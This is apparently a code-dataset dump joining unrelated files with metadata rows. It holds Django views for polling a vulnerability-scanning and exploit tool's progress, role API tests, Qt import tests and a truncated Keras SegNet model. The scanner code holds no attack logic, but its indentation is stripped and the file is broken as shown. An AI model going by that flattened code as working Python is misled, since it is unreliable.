return the configuration for the vul scanning for the records for which the discovery would be over.
This is essentially used in concurrent mode
In order to understand about input given to this method and response returned read API documentation.
"""
def get(self,request,format=None):
try:
return_response={}
project_id=request.data["project_id"]
obj=Polling.PollingExploits(int(project_id))
continue_=False
delete=False
default_config=obj.getConfiguration() #Get config of all records with pid
if default_config["status"]=="reconfig":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
except Exception ,ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
return_response={}
update_data=Polling_(data=request.data)
return_response={}
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
return_response=obj.UpdateStatus(record_list)
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class PercentPolling(APIView):
"""
Objective :
The objective of this class is to serve the Get-Post method which would return teh percantage of the
completion in case of discovery and vulnerability scanning
In order to understand about input given to this method and response returned read API documentation.
"""
def get(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
return_response={}
poll_data=Poll_me(data=request.data)
if poll_data.is_valid():
project_id=request.data["project_id"]
#result=self.project_obj.completed_projects(int(project_id))
if 1:#result[0] > 0:
obj=IPtable.Projects()
continue_=False
delete=False
valid_source=["discovery","scan"]
if request.data["source"] not in valid_source:
return_response["status"]="failure"
return_response["data"]="The source can either be scan or discovery"
return_response["value"]="The source can either be scan or discovery"
return Response(JSONRenderer().render(return_response))
poll_results=obj.Poll(int(project_id),request.data["source"])
if poll_results != -1:
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=poll_results[0]
return_response["value"]=poll_results[0]
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["value"]="Cant fetch Polling status.Kindly check supplied params"
return_response["data"]="Cant fetch Polling status.Kindly check supplied params"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["value"]="In valid project id"
return_response["data"]="In valid project id"
return Response(JSONRenderer().render(return_response))
else:
return_response["status"]="failure"
return_response["data"]=poll_data.errors
return_response["errors"]=poll_data.errors
return_response["value"]=poll_data.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ScannningStUp(APIView):
def post(self,request,format=None):
try:
return_response={}
update_data=General(data=request.data)
try:
concurrent=request.data["concurrent"] if request.data["concurrent"] != None else -1
except:
concurrent=-1
print "In except and conc is :"+str(concurrent)
return_response={}
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
#record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
if concurrent ==-1:
return_response=obj.UpdateStatusExploit('',True)
else:
return_response=obj.UpdateStatusExploit('',True)
return_response=obj.UpdateStatusInit()
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class PollingExploit(APIView):
"""
Objective :
The objective of this class is to poll the vulnerability scanning and return results.
In order to understand about input given to this method and response returned read API documentation.
"""
def get(self,request,format=None):
try:
self.project_obj=IPtable.Projects()
return_response={}
project_id=request.data["project_id"]
#Note the project need not be having status as complete
#as we might need this for concurrent mode also where the status
#of the master project might not be complete
#result=self.project_obj.completed_projects(int(project_id))
#if result[0] > 0:
if 1:
obj=Polling.PollingExploits(int(project_id))
continue_=False
delete=False
default_config=obj.ExploitPoll()
if default_config["status"]=="success":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
else:
return_response["status"]="failure"
return_response["data"]="In valid project id"
return_response["value"]="In valid project id"
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
def post(self,request,format=None):
try:
return_response={}
update_data=Polling_(data=request.data)
return_response={}
if(update_data.is_valid()):
project_id=update_data.data["project_id"]
record_list=update_data.data["record_list"]
obj=Polling.PollingExploits(int(project_id))
return_response=obj.UpdateStatusExploit(record_list)
else:
return_response["status"]="failure"
return_response["errors"]=update_data.errors
return_response["value"]=update_data.errors
return Response(JSONRenderer().render(return_response))
except Exception ,ee:
return_response["status"]="failure"
return_response["value"]=str(ee)
return Response(JSONRenderer().render(return_response))
class ExploitConfigConc(APIView):
"""
Objective :
The objective of this class is to serve Get method which would be used
to fetch results of vulnerability scanning when mode is concurrent.
It is different fro polling as polling will give us config for records which have been immidiately
finished by discovery ,but this will give use the chosen/updated config for all the records
In order to understand about input given to this method and response returned read API documentation.
"""
def get(self,request,format=None):
try:
return_response={}
obj=Gui_main_driver.Gui_main()
project_id=request.data["project_id"]
continue_=False
delete=False
default_config=obj.getDefaultConfiguration(project_id,'','',True,True,'')
if default_config["status"]=="reconfig":
exp_obj=Reconfigure()
resp=exp_obj.configure_response(default_config)
config_dict=resp[0]
config_list=resp[1]
record_list=resp[2]
return_response["status"]="success"
#return_response["data"]=serialize.data #Note Both work the same !!!
return_response["data"]=config_list
return_response["record_list"]=record_list
return Response(JSONRenderer().render(return_response))
else:
return Response(JSONRenderer().render(default_config))
except Exception ,ee:
#except Exception ,ee:
return_response["status"]="failure"
return_response["data"]=str(ee)
return Response(JSONRenderer().render(return_response))
| 36.383687 | 284 | 0.718081 | 9,675 | 75,387 | 5.396279 | 0.055194 | 0.166523 | 0.049034 | 0.070486 | 0.831562 | 0.811642 | 0.793426 | 0.774637 | 0.748875 | 0.736616 | 0 | 0.012905 | 0.153037 | 75,387 | 2,071 | 285 | 36.401255 | 0.804777 | 0.108759 | 0 | 0.761555 | 0 | 0 | 0.138824 | 0.002071 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004402 | 0.020543 | null | null | 0.016875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b6d5f5c48e6498417a94cf29e788054e5ef2caf0 | 527 | py | Python | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 4 | 2019-02-20T16:59:39.000Z | 2020-04-08T02:04:58.000Z | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 29 | 2019-02-22T16:19:25.000Z | 2022-03-31T13:02:14.000Z | devoutils/sorter/cmp_compatible.py | aarteagamel/python-utils | 7f310874750acd0171f2968cb45347da6cf78b72 | [
"MIT"
] | 2 | 2019-02-22T14:32:28.000Z | 2020-03-19T15:46:06.000Z | def cmp(a, b):
return (a > b) - (a < b)
# mixin class for Python3 supporting __cmp__
class PY3__cmp__:
def __eq__(self, other):
return self.__cmp__(other) == 0
def __ne__(self, other):
return self.__cmp__(other) != 0
def __gt__(self, other):
return self.__cmp__(other) > 0
def __lt__(self, other):
return self.__cmp__(other) < 0
def __ge__(self, other):
return self.__cmp__(other) >= 0
def __le__(self, other):
return self.__cmp__(other) <= 0
| 21.08 | 44 | 0.59962 | 72 | 527 | 3.611111 | 0.277778 | 0.207692 | 0.346154 | 0.438462 | 0.703846 | 0.703846 | 0.703846 | 0.596154 | 0 | 0 | 0 | 0.020997 | 0.27704 | 527 | 24 | 45 | 21.958333 | 0.661417 | 0.079696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0 | 0 | 0.466667 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
b6e343d2e1a30fcbe2655f82ddf0c5d80bdfb9ce | 201 | py | Python | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | exapi/response_handlers/binance/spot/trading/__init__.py | astsu-dev/exapi | 1ef39ccdd77e9ddb60ec6eaa16a2cc26e1ac3e12 | [
"MIT"
] | null | null | null | from exapi.response_handlers.binance.spot.trading.handler import BinanceSpotTradingResponseHandler
from exapi.response_handlers.binance.spot.trading.interface import IBinanceSpotTradingResponseHandler
| 67 | 101 | 0.910448 | 20 | 201 | 9.05 | 0.6 | 0.099448 | 0.187845 | 0.276243 | 0.475138 | 0.475138 | 0.475138 | 0 | 0 | 0 | 0 | 0 | 0.039801 | 201 | 2 | 102 | 100.5 | 0.937824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b6ed2af1d1ab85e42f629f00ae2ccf7357f69702 | 9,391 | py | Python | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | null | null | null | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | 35 | 2021-03-09T00:10:44.000Z | 2021-04-28T22:39:22.000Z | tests/test_roles.py | PiWatcher/pci-backend | 094e366c47ca2ca17f5d7d54e0d15251d4f6494a | [
"MIT"
] | null | null | null | import json
from tests.TestingSuite import BaseTestingSuite
class TestRolesResource(BaseTestingSuite):
def setUp(self):
print("Testing Roles resources...")
super().setUp()
self.user_payload = json.dumps({
"email": "iotadmin@nau.edu",
"password": "password"
})
def test_successfull_collect_roles(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json["jwt_token"]
response = self.app.get('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual({
'can_view_raw': True,
'is_admin': True,
'role_name': 'admin'
}, response.json['roles'][0])
self.assertEqual(200, response.status_code)
def test_bad_permissions_collect_roles(self):
test_user_payload = json.dumps({
"email": "testuser@test.com",
"password": 'testpassword',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "testuser@test.com",
"password": "testpassword",
})).json['jwt_token']
response = self.app.get('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_successful_create_role(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "iotadmin@nau.edu",
"password": "password"
})).json['jwt_token']
response = self.app.post('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'role_name': 'test_role'
}))
self.assertEqual({
'role_name': 'test_role',
'is_admin': False,
'can_view_raw': False
}, response.json['new_role'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_create_role(self):
test_user_payload = json.dumps({
"email": "testuser@test.com",
"password": 'testpassword',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "testuser@test.com",
"password": "testpassword",
})).json['jwt_token']
response = self.app.get('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'role_name': 'test_role'
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_successful_delete_role(self):
admin_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {admin_token}'
},
data=json.dumps({
'role_name': 'public'
}))
self.assertEqual('Successfully deleted public from roles.', response.json['message'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_delete_role(self):
test_user_payload = json.dumps({
"email": "testuser@test.com",
"password": 'testpassword',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "testuser@test.com",
"password": "testpassword",
})).json['jwt_token']
response = self.app.delete('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'role_name': 'public'
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_schema_error_delete_role(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'not_a_valid_key': 'randomdata'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_role_dne_error_delete_role(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/roles',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'role_name': 'a_role_that_does_not_exist'
}))
self.assertEqual('That role does not exist.', response.json['message'])
self.assertEqual(400, response.status_code)
| 43.276498 | 93 | 0.388776 | 667 | 9,391 | 5.308846 | 0.136432 | 0.03756 | 0.096583 | 0.155606 | 0.854561 | 0.842982 | 0.835357 | 0.835357 | 0.814459 | 0.768427 | 0 | 0.005407 | 0.507614 | 9,391 | 216 | 94 | 43.476852 | 0.760381 | 0 | 0 | 0.730769 | 0 | 0 | 0.208413 | 0.002769 | 0 | 0 | 0 | 0 | 0.087912 | 1 | 0.049451 | false | 0.043956 | 0.010989 | 0 | 0.065934 | 0.005495 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8e287da622f071339141aa812b8e04cc9cc643c8 | 4,935 | py | Python | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | 1 | 2022-01-28T00:03:19.000Z | 2022-01-28T00:03:19.000Z | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | null | null | null | GPS_vis_env/Lib/site-packages/qtpy/tests/test_qtdatavisualization.py | morekeng/GPS-visualization-Python | c07fd3128e94b10699bf12b0418ec8ef476755da | [
"MIT"
] | 1 | 2021-11-23T00:49:26.000Z | 2021-11-23T00:49:26.000Z | from __future__ import absolute_import
import sys
import pytest
from qtpy import PYQT5, PYSIDE2
from qtpy.py3compat import PY3
@pytest.mark.skipif(
sys.platform != "win32" or not (PYQT5 or PYSIDE2) or PY3,
reason="Only available in Qt5 bindings and Python 2 on Windows")
def test_qtdatavisualization():
"""Test the qtpy.QtDataVisualization namespace"""
# QtDataVisualization
assert qtpy.QtDataVisualization.QScatter3DSeries is not None
assert qtpy.QtDataVisualization.QSurfaceDataItem is not None
assert qtpy.QtDataVisualization.QSurface3DSeries is not None
assert qtpy.QtDataVisualization.QAbstract3DInputHandler is not None
assert qtpy.QtDataVisualization.QHeightMapSurfaceDataProxy is not None
assert qtpy.QtDataVisualization.QAbstractDataProxy is not None
assert qtpy.QtDataVisualization.Q3DCamera is not None
assert qtpy.QtDataVisualization.QAbstract3DGraph is not None
assert qtpy.QtDataVisualization.QCustom3DVolume is not None
assert qtpy.QtDataVisualization.Q3DInputHandler is not None
assert qtpy.QtDataVisualization.QBarDataProxy is not None
assert qtpy.QtDataVisualization.QSurfaceDataProxy is not None
assert qtpy.QtDataVisualization.QScatterDataItem is not None
assert qtpy.QtDataVisualization.Q3DLight is not None
assert qtpy.QtDataVisualization.QScatterDataProxy is not None
assert qtpy.QtDataVisualization.QValue3DAxis is not None
assert qtpy.QtDataVisualization.Q3DBars is not None
assert qtpy.QtDataVisualization.QBarDataItem is not None
assert qtpy.QtDataVisualization.QItemModelBarDataProxy is not None
assert qtpy.QtDataVisualization.Q3DTheme is not None
assert qtpy.QtDataVisualization.QCustom3DItem is not None
assert qtpy.QtDataVisualization.QItemModelScatterDataProxy is not None
assert qtpy.QtDataVisualization.QValue3DAxisFormatter is not None
assert qtpy.QtDataVisualization.QItemModelSurfaceDataProxy is not None
assert qtpy.QtDataVisualization.Q3DScatter is not None
assert qtpy.QtDataVisualization.QTouch3DInputHandler is not None
assert qtpy.QtDataVisualization.QBar3DSeries is not None
assert qtpy.QtDataVisualization.QAbstract3DAxis is not None
assert qtpy.QtDataVisualization.Q3DScene is not None
assert qtpy.QtDataVisualization.QCategory3DAxis is not None
assert qtpy.QtDataVisualization.QAbstract3DSeries is not None
assert qtpy.QtDataVisualization.Q3DObject is not None
assert qtpy.QtDataVisualization.QCustom3DLabel is not None
assert qtpy.QtDataVisualization.Q3DSurface is not None
assert qtpy.QtDataVisualization.QLogValue3DAxisFormatter is not None
# QtDatavisualization
assert qtpy.QtDatavisualization.QScatter3DSeries is not None
assert qtpy.QtDatavisualization.QSurfaceDataItem is not None
assert qtpy.QtDatavisualization.QSurface3DSeries is not None
assert qtpy.QtDatavisualization.QAbstract3DInputHandler is not None
assert qtpy.QtDatavisualization.QHeightMapSurfaceDataProxy is not None
assert qtpy.QtDatavisualization.QAbstractDataProxy is not None
assert qtpy.QtDatavisualization.Q3DCamera is not None
assert qtpy.QtDatavisualization.QAbstract3DGraph is not None
assert qtpy.QtDatavisualization.QCustom3DVolume is not None
assert qtpy.QtDatavisualization.Q3DInputHandler is not None
assert qtpy.QtDatavisualization.QBarDataProxy is not None
assert qtpy.QtDatavisualization.QSurfaceDataProxy is not None
assert qtpy.QtDatavisualization.QScatterDataItem is not None
assert qtpy.QtDatavisualization.Q3DLight is not None
assert qtpy.QtDatavisualization.QScatterDataProxy is not None
assert qtpy.QtDatavisualization.QValue3DAxis is not None
assert qtpy.QtDatavisualization.Q3DBars is not None
assert qtpy.QtDatavisualization.QBarDataItem is not None
assert qtpy.QtDatavisualization.QItemModelBarDataProxy is not None
assert qtpy.QtDatavisualization.Q3DTheme is not None
assert qtpy.QtDatavisualization.QCustom3DItem is not None
assert qtpy.QtDatavisualization.QItemModelScatterDataProxy is not None
assert qtpy.QtDatavisualization.QValue3DAxisFormatter is not None
assert qtpy.QtDatavisualization.QItemModelSurfaceDataProxy is not None
assert qtpy.QtDatavisualization.Q3DScatter is not None
assert qtpy.QtDatavisualization.QTouch3DInputHandler is not None
assert qtpy.QtDatavisualization.QBar3DSeries is not None
assert qtpy.QtDatavisualization.QAbstract3DAxis is not None
assert qtpy.QtDatavisualization.Q3DScene is not None
assert qtpy.QtDatavisualization.QCategory3DAxis is not None
assert qtpy.QtDatavisualization.QAbstract3DSeries is not None
assert qtpy.QtDatavisualization.Q3DObject is not None
assert qtpy.QtDatavisualization.QCustom3DLabel is not None
assert qtpy.QtDatavisualization.Q3DSurface is not None
assert qtpy.QtDatavisualization.QLogValue3DAxisFormatter is not None
| 56.724138 | 74 | 0.823303 | 543 | 4,935 | 7.471455 | 0.130755 | 0.402514 | 0.50037 | 0.251417 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0.932216 | 0 | 0.013938 | 0.142249 | 4,935 | 86 | 75 | 57.383721 | 0.944484 | 0.017021 | 0 | 0 | 0 | 0 | 0.01218 | 0 | 0 | 0 | 0 | 0 | 0.886076 | 1 | 0.012658 | true | 0 | 0.063291 | 0 | 0.075949 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
8e331b435d0f6fe2af86c540cd8c467c76b5219a | 87 | py | Python | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | tests/import_test.py | whitphx/streamlit-timing | 7578c6a40a7ed3623a1abf453b8d8b8b1a92666b | [
"MIT"
] | null | null | null | def test_streamlit_timing_can_be_imported():
import streamlit_timing # noqa: F401
| 29 | 44 | 0.804598 | 12 | 87 | 5.333333 | 0.833333 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.137931 | 87 | 2 | 45 | 43.5 | 0.813333 | 0.114943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f3dfce8c5e9417208b90785c7539925a120e1abf | 228 | py | Python | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 197 | 2019-06-29T07:59:40.000Z | 2022-03-13T14:10:54.000Z | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 158 | 2019-07-04T09:47:12.000Z | 2022-03-30T06:12:34.000Z | tests/python/pypackagecomplex/complex/subpackage/__init__.py | mgaitan/sphinx-autoapi | 0b947a028e10b580936f8e3c32ddc2468479e72d | [
"MIT"
] | 91 | 2019-07-02T17:52:32.000Z | 2022-03-29T12:34:11.000Z | from .submodule import public_chain
from .submodule import _private_made_public as now_public_function
from .submodule import public_multiple_imports
def module_level_method(foo, bar):
"""A module level method"""
pass
| 25.333333 | 66 | 0.802632 | 32 | 228 | 5.40625 | 0.625 | 0.225434 | 0.32948 | 0.289017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 228 | 8 | 67 | 28.5 | 0.882653 | 0.092105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.2 | 0.6 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
f3e5d251175c963ac91057e7e32cbda7b0f8e383 | 162 | py | Python | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | 2 | 2015-08-11T12:27:48.000Z | 2016-04-17T10:51:53.000Z | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | null | null | null | avara/admin.py | avara1986/avara | 6fc4dac08f7b00fcd53c885b2426a1b5be20a1c9 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
admin.site.register(User, UserAdmin) | 32.4 | 47 | 0.839506 | 24 | 162 | 5.666667 | 0.458333 | 0.220588 | 0.375 | 0.308824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 162 | 5 | 48 | 32.4 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f3f19395628fbcc28476078f72f4267db7b93d54 | 4,744 | py | Python | 常用分割模型/SegNet.py | 1044197988/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 160 | 2019-09-19T14:13:23.000Z | 2022-03-25T03:14:20.000Z | 常用分割模型/SegNet.py | johonnyyang/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 1 | 2020-11-11T08:37:02.000Z | 2020-11-11T08:37:58.000Z | 常用分割模型/SegNet.py | johonnyyang/TF.Keras-Commonly-used-models | b37276bcee454b2c39b8fcc60e87b72ec8a6a5d4 | [
"Apache-2.0"
] | 70 | 2019-09-24T03:05:09.000Z | 2022-03-25T03:14:21.000Z | from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,UpSampling2D,BatchNormalization,Reshape,Permute,Activation
#设置图像大小
img_w = 512
img_h = 512
#分类
n_label=6
def SegNet():
model = Sequential()
#encoder
model.add(Conv2D(64,(3,3),strides=(1,1),input_shape=(img_w,img_h,3),padding='same',activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64,(3,3),strides=(1,1),padding='same',activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
#(128,128)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
#(64,64)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(32,32)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(16,16)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
#(8,8)
#decoder
model.add(UpSampling2D(size=(2,2)))
#(16,16)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
#(32,32)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
